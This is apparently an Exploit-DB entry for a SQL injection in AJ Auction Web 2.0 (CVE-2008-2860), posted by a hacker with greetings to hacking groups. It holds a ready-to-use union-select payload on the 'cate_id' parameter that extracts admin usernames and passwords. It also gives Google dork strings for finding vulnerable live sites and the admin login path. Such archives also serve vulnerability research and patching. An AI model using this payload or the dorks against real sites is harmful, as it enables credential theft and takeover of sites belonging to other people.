Lucene search
Hussin XEDB-ID:5867HistoryJun 19, 2008 - 12:00 a.m.
AJ Auction Web 2.0 - 'cate_id' SQL Injection
2008-06-1900:00:00
Hussin X
www.exploit-db.com
32
AI Score
7.4
Confidence
Low
#########################################################
#
# Auction Web 2.0 SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# hussin.x[at]hotmail[DoT]com =
# =
#=========================================================
# HomE script : http://www.ajauctionpro.com/ajhome.php
#
# Demo : http://www.ajauctionpro.com/auction_web2.0/
#
# DorK : Powered By AJ Auction Web
# DorK : Powered By Auction Web
#
##########################################################
Exploit:
http://localhost.com/[PaTs]/category.php?cate_id=-1+union+select+1,concat(user_name,0x3a,password),3,4+from+admin--
Admin login
admin/index.php
################################################################################
#####################################( Greetz )#################################
# #
# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA #
# mos_chori / Rafi / FAHD / Iraq Hackers / #
# #
#################################(and All IRAQIs)###############################
################################################################################
# milw0rm.com [2008-06-19]Related
prion
prion
Sql injection
2008-06-25 12:36:00
nvd
nvd
CVE-2008-2860
2008-06-25 12:36:00
cve
cve
CVE-2008-2860
2008-06-25 12:36:00
cvelist
cvelist
CVE-2008-2860
2008-06-25 10:00:00